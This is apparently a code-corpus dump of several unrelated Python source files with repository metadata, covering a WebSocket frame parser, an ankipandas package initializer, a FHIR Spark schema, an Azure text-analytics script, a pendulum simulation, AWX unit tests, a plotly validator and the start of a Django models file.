            else:
                # A 1-byte close payload is a protocol error.
                status = 1002
            self.close(close_data=(status, ''))
            raise ConnectionClosedError()
        elif opcode == 9:  # ping
            # Echo the payload back as a pong.
            self.send(data, control_code=0xA)
        elif opcode == 0xA:  # pong
            pass
        else:
            raise FailedConnectionError(
                1002, "Unknown control frame received.")

    def _iter_frames(self):
        """Generator yielding complete messages; handles fragmentation and
        translates protocol failures into a close + StopIteration."""
        fragmented_message = None
        try:
            while True:
                message = self._recv_frame(message=fragmented_message)
                if message.opcode & 8:
                    # Control frames may interleave with fragments and are
                    # consumed immediately.
                    self._handle_control_frame(
                        message.opcode, message.getvalue())
                    continue
                if fragmented_message and message is not fragmented_message:
                    raise RuntimeError('Unexpected message change.')
                fragmented_message = message
                if message.finished:
                    data = fragmented_message.getvalue()
                    fragmented_message = None
                    yield data
        except FailedConnectionError:
            exc_typ, exc_val, exc_tb = sys.exc_info()
            self.close(close_data=(exc_val.status, exc_val.message))
        except ConnectionClosedError:
            return
        except Exception:
            self.close(close_data=(1011, 'Internal Server Error'))
            raise

    def _recv_frame(self, message=None):
        """Read one frame; return the (possibly still unfinished) Message.

        Passing *message* continues a fragmented message: the frame must
        then be a continuation (opcode 0) or a control frame.
        """
        recv = self._get_bytes

        # Frame header: FIN(1) RSV(3) opcode(4) | MASK(1) length(7).
        header = recv(2)
        a, b = struct.unpack('!BB', header)
        finished = a >> 7 == 1
        rsv123 = a >> 4 & 7
        if rsv123:
            # must be zero
            raise FailedConnectionError(
                1002,
                "RSV1, RSV2, RSV3: MUST be 0 unless an extension is"
                " negotiated that defines meanings for non-zero values.")
        opcode = a & 15
        if opcode not in (0, 1, 2, 8, 9, 0xA):
            raise FailedConnectionError(1002, "Unknown opcode received.")
        masked = b & 128 == 128
        if not masked and not self.client:
            raise FailedConnectionError(1002, "A client MUST mask all frames"
                                        " that it sends to the server")
        length = b & 127
        if opcode & 8:
            # Control frames: never fragmented, payload <= 125 bytes.
            if not finished:
                raise FailedConnectionError(1002, "Control frames must not"
                                            " be fragmented.")
            if length > 125:
                raise FailedConnectionError(
                    1002,
                    "All control frames MUST have a payload length of 125"
                    " bytes or less")
        elif opcode and message:
            raise FailedConnectionError(
                1002,
                "Received a non-continuation opcode within"
                " fragmented message.")
        elif not opcode and not message:
            raise FailedConnectionError(
                1002,
                "Received continuation opcode with no previous"
                " fragments received.")
        # Extended payload length: 126 -> 16-bit, 127 -> 64-bit.
        if length == 126:
            length = struct.unpack('!H', recv(2))[0]
        elif length == 127:
            length = struct.unpack('!Q', recv(8))[0]
        if masked:
            mask = struct.unpack('!BBBB', recv(4))
        received = 0
        if not message or opcode & 8:
            # A control frame gets its own Message even mid-fragmentation.
            decoder = self.UTF8Decoder() if opcode == 1 else None
            message = self.Message(opcode, decoder=decoder)
        if not length:
            message.push('', final=finished)
        else:
            # Read the payload in chunks, unmasking each chunk at the
            # correct running offset within the 4-byte mask.
            while received < length:
                d = self.socket.recv(length - received)
                if not d:
                    raise ConnectionClosedError()
                dlen = len(d)
                if masked:
                    d = self._apply_mask(d, mask, length=dlen, offset=received)
                received = received + dlen
                try:
                    message.push(d, final=finished)
                except (UnicodeDecodeError, ValueError):
                    raise FailedConnectionError(
                        1007, "Text data must be valid utf-8")
        return message

    @staticmethod
    def _pack_message(message, masked=False,
                      continuation=False, final=True, control_code=None):
        """Serialize *message* into a single RFC 6455 frame (byte string)."""
        is_text = False
        if isinstance(message, unicode):
            message = message.encode('utf-8')
            is_text = True
        length = len(message)
        if not length:
            # no point masking empty data
            masked = False
        if control_code:
            if control_code not in (8, 9, 0xA):
                raise ProtocolError('Unknown control opcode.')
            if continuation or not final:
                raise ProtocolError('Control frame cannot be a fragment.')
            if length > 125:
                raise ProtocolError('Control frame data too large (>125).')
            header = struct.pack('!B', control_code | 1 << 7)
        else:
            opcode = 0 if continuation else (1 if is_text else 2)
            header = struct.pack('!B', opcode | (1 << 7 if final else 0))
        lengthdata = 1 << 7 if masked else 0
        # Choose the shortest length encoding: 7-bit, 16-bit or 64-bit.
        if length > 65535:
            lengthdata = struct.pack('!BQ', lengthdata | 127, length)
        elif length > 125:
            lengthdata = struct.pack('!BH', lengthdata | 126, length)
        else:
            lengthdata = struct.pack('!B', lengthdata | length)
        if masked:
            # NOTE: RFC6455 states:
            # A server MUST NOT mask any frames that it sends to the client
            rand = Random(time.time())
            mask = map(rand.getrandbits, (8, ) * 4)
            message = RFC6455WebSocket._apply_mask(message, mask, length)
            maskdata = struct.pack('!BBBB', *mask)
        else:
            maskdata = ''
        return ''.join((header, lengthdata, maskdata, message))

    def wait(self):
        """Return the next complete message, or None once the peer closed."""
        for i in self.iterator:
            return i

    def _send(self, frame):
        # Serialize concurrent senders (see WebSocket._sendlock).
        self._sendlock.acquire()
        try:
            self.socket.sendall(frame)
        finally:
            self._sendlock.release()

    def send(self, message, **kw):
        """Send *message* as one frame; extra kwargs go to _pack_message."""
        kw['masked'] = self.client
        payload = self._pack_message(message, **kw)
        self._send(payload)

    def _send_closing_frame(self, ignore_send_errors=False, close_data=None):
        """Send a close frame (opcode 8) with optional (status, reason)."""
        if self.version in (8, 13) and not self.websocket_closed:
            if close_data is not None:
                status, msg = close_data
                if isinstance(msg, unicode):
                    msg = msg.encode('utf-8')
                data = struct.pack('!H', status) + msg
            else:
                data = ''
            try:
                self.send(data, control_code=8)
            except SocketError:
                # Sometimes, like when the remote side cuts off the connection,
                # we don't care about this.
                if not ignore_send_errors:  # pragma NO COVER
                    raise
            self.websocket_closed = True

    def close(self, close_data=None):
        """Forcibly close the websocket; generally it is preferable to
        return from the handler method."""
        self._send_closing_frame(close_data=close_data)
        self.socket.shutdown(socket.SHUT_WR)
        self.socket.close()
| 38.216134
| 109
| 0.561614
|
4a07c93eac8c767581676ac9281a379f9bdf0c47
| 338
|
py
|
Python
|
ankipandas/__init__.py
|
khonkhortisan/AnkiPandas
|
44ca736a46b22fb2ffb200cc4f2c3184184ee29d
|
[
"MIT"
] | 1
|
2020-05-20T18:35:20.000Z
|
2020-05-20T18:35:20.000Z
|
ankipandas/__init__.py
|
andrewsanchez/AnkiPandas
|
3f6e2309493b73237b89ddf76561694c940871ca
|
[
"MIT"
] | null | null | null |
ankipandas/__init__.py
|
andrewsanchez/AnkiPandas
|
3f6e2309493b73237b89ddf76561694c940871ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3

# Package initializer: pulls the public API up to the top-level namespace.
import ankipandas.raw
import ankipandas.paths
import ankipandas.util
# NOTE(review): duplicate of the `import ankipandas.paths` above -- harmless
# but redundant; candidate for removal.
import ankipandas.paths
import ankipandas.collection

# Re-exported public names.
from ankipandas.collection import Collection
from ankipandas.paths import find_db, db_path_input
from ankipandas.ankidf import AnkiDataFrame
from ankipandas.util.log import log, set_log_level
| 28.166667
| 51
| 0.857988
|
4a07c991c88432477757d3982978944d1d0f22c0
| 8,645
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | 2
|
2020-10-31T23:25:01.000Z
|
2021-06-09T14:12:42.000Z
|
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/quantity.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class QuantitySchema:
"""
A measured amount (or an amount that can potentially be measured). Note that
measured amounts include amounts that are not precisely quantified, including
amounts involving arbitrary units and floating currencies.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
) -> Union[StructType, DataType]:
"""
A measured amount (or an amount that can potentially be measured). Note that
measured amounts include amounts that are not precisely quantified, including
amounts involving arbitrary units and floating currencies.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
value: The value of the measured amount. The value includes an implicit precision in
the presentation of the value.
comparator: How the value should be understood and represented - whether the actual value
is greater or less than the stated value due to measurement issues; e.g. if
the comparator is "<" , then the real value is < stated value.
unit: A human-readable form of the unit.
system: The identification of the system that provides the coded form of the unit.
code: A computer processable form of the unit in some unit representation system.
"""
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.simple_types.uri import uriSchema
from spark_fhir_schemas.r4.simple_types.code import codeSchema
if (
max_recursion_limit
and nesting_list.count("Quantity") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Quantity"]
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The value of the measured amount. The value includes an implicit precision in
# the presentation of the value.
StructField(
"value",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# How the value should be understood and represented - whether the actual value
# is greater or less than the stated value due to measurement issues; e.g. if
# the comparator is "<" , then the real value is < stated value.
StructField("comparator", StringType(), True),
# A human-readable form of the unit.
StructField("unit", StringType(), True),
# The identification of the system that provides the coded form of the unit.
StructField(
"system",
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A computer processable form of the unit in some unit representation system.
StructField(
"code",
codeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 46.983696
| 97
| 0.575824
|
4a07c9b4a8081aa1f2c3f5af8cd2748db63dc82a
| 3,490
|
py
|
Python
|
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | null | null | null |
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | 1
|
2019-03-28T00:47:28.000Z
|
2019-10-08T23:11:38.000Z
|
entities.py
|
gjwgit/aztext
|
a3a824fe82402bafe9a7360ec84c00bc90326cde
|
[
"MIT"
] | 1
|
2021-05-13T04:42:16.000Z
|
2021-05-13T04:42:16.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# Author: Graham.Williams@microsoft.com
#
# A command line script to analyze text.
#
# ml analyze entities <sentence>
#
# https://docs.microsoft.com/en-us/azure/cognitive-services/text-analytics/
# quickstarts/python-sdk
#
# ----------------------------------------------------------------------
# Setup
# ----------------------------------------------------------------------
# Import the required libraries.
import sys
import argparse
from utils import request_priv_info
# pip3 install --upgrade --user azure-cognitiveservices-language-textanalytics
from azure.cognitiveservices.language.textanalytics import TextAnalyticsClient
from msrest.authentication import CognitiveServicesCredentials
# ----------------------------------------------------------------------
# Parse command line arguments
# ----------------------------------------------------------------------
# Sentences may be given as positional args; with none given, text is read
# from stdin or prompted for interactively (see the bottom of this file).
option_parser = argparse.ArgumentParser(add_help=False)
option_parser.add_argument(
    'sentence',
    nargs="*",
    help='sentence to analyse')
args = option_parser.parse_args()
# ----------------------------------------------------------------------
# Request subscription key and endpoint from user.
# ----------------------------------------------------------------------
# request_priv_info() returns the Azure subscription key and service endpoint.
key, endpoint = request_priv_info()
# Module-level client used by analyseText() below.
credentials = CognitiveServicesCredentials(key)
client = TextAnalyticsClient(endpoint=endpoint, credentials=credentials)
# ------------------------------------------------------------------------
# Helper function
# ------------------------------------------------------------------------
def analyseText(txt):
    """Detect the language of txt, extract named entities, print them as CSV.

    One comma-separated line per entity:
    name,type,sub_type,entity_type_score,offset,length,
    wikipedia_score,wikipedia_language,wikipedia_id,wikipedia_url
    (the wikipedia fields are left empty when there is no wikipedia match).

    Relies on the module-level `client` (TextAnalyticsClient).
    """
    # First pass: detect the language so entity extraction can use it.
    documents = [{'id': '1', 'text': txt}]
    response = client.detect_language(documents=documents)
    l = response.documents[0]
    dl = l.detected_languages[0]
    lang = dl.iso6391_name
    # Second pass: entity extraction with the detected language.
    documents = [{'id': '1', 'language': lang, 'text': txt}]
    response = client.entities(documents=documents)
    for es in response.documents:
        for e in es.entities:
            # Only the first match of each entity is reported.
            m = e.matches[0]
            print(f"{e.name},", end="")
            print(f"{e.type},", end="")
            # Use identity comparison with None (PEP 8) instead of ==/!=.
            if e.sub_type is None:
                print(",", end="")
            else:
                print(f"{e.sub_type},", end="")
            if m.entity_type_score is not None:
                print(f"{m.entity_type_score:0.2f},", end="")
            else:
                print("0.00,", end="")
            print(f"{m.offset},{m.length},", end="")
            if m.wikipedia_score is None:
                print(",,,")
            else:
                print(f"{m.wikipedia_score:0.2f},{e.wikipedia_language},{e.wikipedia_id},{e.wikipedia_url}")
# ------------------------------------------------------------------------
# Obtain text and analyze.
# ------------------------------------------------------------------------
txt = " ".join(args.sentence)
if txt != "":
    # Text supplied on the command line.
    analyseText(txt)
elif not sys.stdin.isatty():
    # Text piped in: analyse each line separately.
    for txt in sys.stdin.readlines():
        analyseText(txt)
        print()
else:
    # Interactive mode: prompt until an empty line or EOF (Ctrl-d).
    print("Enter text to be analysed. Quit with Empty or Ctrl-d.\n")
    prompt = '> '
    try:
        txt = input(prompt)
    except EOFError:
        print()
        sys.exit(0)
    while txt != '':
        analyseText(txt)
        try:
            print()
            txt = input(prompt)
        except EOFError:
            print()
            sys.exit(0)
| 29.083333
| 108
| 0.488252
|
4a07cad3729bb6d70305250b4bad59c6c3986e8b
| 5,478
|
py
|
Python
|
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
runs/rwip12/Pendulum.py
|
drib861204/Soft-Actor-Critic-and-Extensions
|
3075df7430c1c49177b3798d753a9e3f6226672e
|
[
"MIT"
] | null | null | null |
"""
Title: pendulum_pygame
Author: [jadenhensley](https://github.com/jadenhensley)
Last modified: 2021/10/18
Description: Pendulum project, built using pygame and math modules.
Title: wheelPole
Author: [aimetz](https://github.com/aimetz)
Last modified: 2021/04/20
Title: gym/gym/envs/classic_control/pendulum.py
Author: [openai](https://github.com/openai)
Last modified: 2021/10/31
"""
import pygame
from math import pi, sin, cos
import numpy as np
class Pendulum:
    """Reaction-wheel inverted pendulum with optional pygame rendering.

    State is (rod angle, rod angular velocity, wheel angular velocity);
    step() integrates the dynamics with explicit Euler at dt = 1 ms and
    returns a gym-style (state, reward, done, info) tuple.
    """

    def __init__(self, rend):
        # rend: when truthy, open a pygame window for render().
        # paras according to paper [LQR and MPC controller design and comparison for a stationary self-balancing bicycle robot with a reaction wheel]
        self.theta_rod = 0
        self.theta_wheel = 0
        self.theta_rod_dot = 0
        self.theta_wheel_dot = 0
        self.len_rod = 0.5 # 0.25
        self.len_wheel = 0.9 # 0.35
        self.rad_wheel = 0.1
        self.mass_rod = 0.1 # 20.1
        self.mass_wheel = 0.05 # 3.7
        # Rod: uniform-bar moment of inertia m*l^2/12.
        self.momentum_rod = self.mass_rod*self.len_rod**2/12
        self.momentum_wheel = self.mass_wheel*self.rad_wheel**2/2 #depends on wheel shape
        self.dt = 0.001
        self.gravity = 9.8
        # Cap on wheel angular velocity (rad/s), applied in step().
        self.max_speed = 100
        self.torque = 0
        self.voltage = 0
        # Window geometry; pendulum pivot is centred on screen.
        width = 800
        height = 600
        self.origin_x = width//2
        self.origin_y = height//2
        self.POS = np.array([self.origin_x, self.origin_y])
        if rend:
            pygame.init()
            self.screen = pygame.display.set_mode((width, height))
            pygame.display.set_caption("Pendulum Simulation")
            pygame.font.init()
            self.debug_font = pygame.font.SysFont('Bauhuas 93', 30)
            self.hint_font = pygame.font.SysFont('Bauhaus 93', 26)
            #print("font")

    def reset(self):
        """Reset to a random rod angle within +-roll_range degrees, zero velocities.

        Returns the initial observation [theta_rod, theta_rod_dot, theta_wheel_dot].
        """
        roll_range = 20 #in degree
        self.theta_rod = (np.random.random()*2-1)*roll_range*pi/180
        #self.theta_wheel = 0
        self.theta_rod_dot = 0
        self.theta_wheel_dot = 0
        state = np.array([self.theta_rod, self.theta_rod_dot, self.theta_wheel_dot], dtype=np.float32)
        return state

    def render(self, eval_run):
        """Draw the rod, wheel and marker plus torque/voltage read-outs."""
        #torque = action
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        # Pixels per metre for drawing.
        SCALE = 100
        BLACK = (0, 0, 0)
        WHITE = (255, 255, 255)
        RED = (255, 0, 0)
        GRAY = (128, 128, 128)
        # Rod tip position in screen coordinates (y axis points down).
        tip_x = self.POS[0]+self.len_wheel*sin(self.theta_rod)*SCALE
        tip_y = self.POS[1]-self.len_wheel*cos(self.theta_rod)*SCALE
        POSTIP = np.array([tip_x, tip_y])
        # Marker on the wheel rim showing its rotation.
        POSWHEEL = np.array(([tip_x+self.rad_wheel*sin(self.theta_wheel)*SCALE, tip_y+self.rad_wheel*cos(self.theta_wheel)*SCALE]))
        #print(POSTIP)
        self.screen.fill(WHITE)
        pygame.draw.line(self.screen, BLACK, self.POS, POSTIP, 10)
        pygame.draw.circle(self.screen, GRAY, POSTIP, self.rad_wheel*2*SCALE)
        pygame.draw.circle(self.screen, RED, POSWHEEL, self.rad_wheel*2*SCALE//5)
        img = self.hint_font.render("torque : % .4f" % self.torque, True, BLACK)
        img2 = self.hint_font.render("voltage: % .4f" % self.voltage, True, BLACK)
        img3 = self.hint_font.render("Evaluation Run %d" % eval_run, True, BLACK)
        self.screen.blit(img, (self.origin_x, self.origin_y / 2 - 50))
        self.screen.blit(img2, (self.origin_x, self.origin_y / 2 - 30))
        self.screen.blit(img3, (self.origin_x / 5, self.origin_y / 2 - 50))
        pygame.display.update()

    def step(self, action):
        """Advance the simulation by one dt given a normalized motor command.

        action: motor command, scaled by action_scale to a voltage
                (presumably in [-1, 1] — TODO confirm against the agent).
        Returns (state, reward, done, info) where reward penalizes rod
        angle, rod velocity and applied voltage; done is always False.
        """
        q1 = self.theta_rod
        q2 = self.theta_wheel
        q1_dot = self.theta_rod_dot
        q2_dot = self.theta_wheel_dot
        l1 = self.len_rod
        l2 = self.len_wheel
        m1 = self.mass_rod
        m2 = self.mass_wheel
        I1 = self.momentum_rod
        I2 = self.momentum_wheel
        dt = self.dt
        g = self.gravity
        # DC motor model constants: gearing, torque/back-EMF constants, resistance.
        gear_ratio = 25
        kt = 0.0229
        ke = 0.0229
        R = 0.71
        action_scale = 12
        #torque = action
        voltage = action * action_scale
        # Motor torque with back-EMF proportional to wheel speed.
        torque = gear_ratio*kt/R*(voltage-ke*gear_ratio*q2_dot)
        Ip = m1*l1**2+m2*l2**2+I1+I2
        # Gravitational torque on the rod+wheel assembly.
        a = (m1*l1+m2*l2)*g*sin(angle_normalize(q1))
        newq1_dot = q1_dot + ((a-torque)/(Ip-I2))*dt
        #print("rod ang_vel",newq1_dot)
        #newq1_dot = np.clip(newq1_dot, -self.max_speed, self.max_speed)
        #print("rod ang_vel",newq1_dot)
        newq1 = angle_normalize(angle_normalize(q1) + newq1_dot * dt)
        #print("rod angle",newq1)
        newq2_dot = q2_dot + ((torque*Ip-a*I2)/I2/(Ip-I2))*dt
        newq2_dot = np.clip(newq2_dot, -self.max_speed, self.max_speed)
        #print("wheel ang_vel",newq2_dot)
        newq2 = angle_normalize(angle_normalize(q2) + newq2_dot * dt)
        #print("wheel angle",newq2)
        #print("torque",torque)
        #print("\n")
        #print([torque, newq1[0], newq2[0], newq1_dot[0], newq2_dot[0]])
        state = np.array([newq1[0], newq1_dot[0], newq2_dot[0]], dtype=np.float32)
        self.theta_rod = newq1
        self.theta_wheel = newq2
        self.theta_rod_dot = newq1_dot
        self.theta_wheel_dot = newq2_dot
        self.torque = torque
        self.voltage = voltage
        # Quadratic cost on rod angle, rod velocity and applied voltage.
        costs = 100 * angle_normalize(q1)**2 + 0.1 * q1_dot**2 + 0.001 * voltage**2
        return state, -costs, False, {}

    def close(self):
        """Shut down the pygame window."""
        pygame.display.quit()
        pygame.quit()
def angle_normalize(th):
    """Map an angle in radians into the half-open interval [-pi, pi)."""
    shifted = (th + pi) % (2 * pi)
    return shifted - pi
| 34.45283
| 149
| 0.606061
|
4a07cafd2d288e185520b6aac23a4f9fd46f699b
| 3,701
|
py
|
Python
|
awx/main/tests/unit/models/test_ha.py
|
tongtie/awx
|
1f34d4c1346cb2d79f0f13727d9d823d7df9ad6f
|
[
"Apache-2.0"
] | 1
|
2020-03-03T10:15:32.000Z
|
2020-03-03T10:15:32.000Z
|
awx/main/tests/unit/models/test_ha.py
|
tongtie/awx
|
1f34d4c1346cb2d79f0f13727d9d823d7df9ad6f
|
[
"Apache-2.0"
] | 35
|
2019-04-04T16:53:20.000Z
|
2021-06-02T04:31:23.000Z
|
awx/main/tests/unit/models/test_ha.py
|
akus062381/awx
|
0ac3a377fdb74acb2ecbeb286bd1998d6d72a42a
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from unittest import mock
from unittest.mock import Mock
from decimal import Decimal
from awx.main.models import InstanceGroup, Instance
@pytest.mark.parametrize('capacity_adjustment', [0.0, 0.25, 0.5, 0.75, 1, 1.5, 3])
def test_capacity_adjustment_no_save(capacity_adjustment):
    """set_capacity_value interpolates between cpu and mem capacity by the adjustment."""
    instance = Instance(
        hostname='test-host',
        capacity_adjustment=Decimal(capacity_adjustment),
        capacity=0,
        cpu_capacity=10,
        mem_capacity=1000,
    )
    # Sanity: nothing has been computed yet.
    assert instance.capacity == 0
    assert instance.capacity_adjustment == capacity_adjustment
    instance.set_capacity_value()
    lower = min(instance.mem_capacity, instance.cpu_capacity)
    spread = abs(instance.mem_capacity - instance.cpu_capacity)
    expected = float(instance.capacity_adjustment) * spread + lower
    assert instance.capacity > 0
    assert instance.capacity == expected
def T(impact):
    """Build a mock execution job with the given task_impact."""
    job = mock.Mock(spec_set=['task_impact', 'capacity_type'])
    job.task_impact = impact
    job.capacity_type = 'execution'
    return job
def Is(param):
    """
    param:
        [remaining_capacity1, remaining_capacity2, remaining_capacity3, ...]
        [(jobs_running1, capacity1), (jobs_running2, capacity2), (jobs_running3, capacity3), ...]
    """
    mocked = []
    if isinstance(param[0], tuple):
        # Tuple form: (jobs_running, capacity) pairs.
        for jobs_running, capacity in param:
            instance = Mock()
            instance.capacity = capacity
            instance.jobs_running = jobs_running
            instance.node_type = 'execution'
            mocked.append(instance)
    else:
        # Scalar form: remaining capacities only.
        for remaining in param:
            instance = Mock()
            instance.remaining_capacity = remaining
            instance.node_type = 'execution'
            mocked.append(instance)
    return mocked
class TestInstanceGroup(object):
    """Unit tests for InstanceGroup's instance-selection heuristics."""

    @pytest.mark.parametrize(
        'task,instances,instance_fit_index,reason',
        [
            (T(100), Is([100]), 0, "Only one, pick it"),
            (T(100), Is([100, 100]), 0, "Two equally good fits, pick the first"),
            (T(100), Is([50, 100]), 1, "First instance not as good as second instance"),
            (T(100), Is([50, 0, 20, 100, 100, 100, 30, 20]), 3, "Pick Instance [3] as it is the first that the task fits in."),
            (T(100), Is([50, 0, 20, 99, 11, 1, 5, 99]), None, "The task don't a fit, you must a quit!"),
        ],
    )
    def test_fit_task_to_most_remaining_capacity_instance(self, task, instances, instance_fit_index, reason):
        """The first instance whose remaining capacity fits the task is picked; None if no fit."""
        ig = InstanceGroup(id=10)
        instance_picked = ig.fit_task_to_most_remaining_capacity_instance(task, instances)
        if instance_fit_index is None:
            assert instance_picked is None, reason
        else:
            assert instance_picked == instances[instance_fit_index], reason

    @pytest.mark.parametrize(
        'instances,instance_fit_index,reason',
        [
            (Is([(0, 100)]), 0, "One idle instance, pick it"),
            (Is([(1, 100)]), None, "One un-idle instance, pick nothing"),
            (Is([(0, 100), (0, 200), (1, 500), (0, 700)]), 3, "Pick the largest idle instance"),
            (Is([(0, 100), (0, 200), (1, 10000), (0, 700), (0, 699)]), 3, "Pick the largest idle instance"),
            (Is([(0, 0)]), None, "One idle but down instance, don't pick it"),
        ],
    )
    def test_find_largest_idle_instance(self, instances, instance_fit_index, reason):
        """Among online (capacity > 0) instances, the largest idle one wins."""
        # Mimic production filtering: drop instances with zero capacity.
        def filter_offline_instances(*args):
            return filter(lambda i: i.capacity > 0, instances)
        ig = InstanceGroup(id=10)
        instances_online_only = filter_offline_instances(instances)
        if instance_fit_index is None:
            assert ig.find_largest_idle_instance(instances_online_only) is None, reason
        else:
            assert ig.find_largest_idle_instance(instances_online_only) == instances[instance_fit_index], reason
| 40.228261
| 150
| 0.636044
|
4a07cc6a3df5f8ffe171c1e54131fb6c7ae69d78
| 601
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/streamtube/lighting/_facenormalsepsilon.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class FacenormalsepsilonValidator(_plotly_utils.basevalidators.NumberValidator):
    """Number validator for streamtube.lighting.facenormalsepsilon (range 0..1)."""

    def __init__(
        self,
        plotly_name="facenormalsepsilon",
        parent_name="streamtube.lighting",
        **kwargs
    ):
        # Pull defaultable options out of kwargs so callers may override them.
        options = {
            "edit_type": kwargs.pop("edit_type", "calc"),
            "max": kwargs.pop("max", 1),
            "min": kwargs.pop("min", 0),
            "role": kwargs.pop("role", "style"),
        }
        super(FacenormalsepsilonValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            **options,
            **kwargs
        )
| 30.05
| 80
| 0.607321
|
4a07ccbb39f5c328690fe7feca5b30efa8f5e709
| 5,778
|
py
|
Python
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 2
|
2020-11-09T03:48:36.000Z
|
2021-07-02T14:30:09.000Z
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 132
|
2020-04-25T15:57:56.000Z
|
2022-03-10T19:15:51.000Z
|
portal/capstone/models.py
|
LDSSA/portal
|
9561da1e262678fe68dcf51c66007c0fb13eb51a
|
[
"MIT"
] | 1
|
2020-10-24T16:15:57.000Z
|
2020-10-24T16:15:57.000Z
|
import logging
from datetime import datetime, timezone
from urllib.parse import urljoin
from django.db import models
from django.conf import settings
from portal.hackathons.models import random_path
from portal.users.models import User
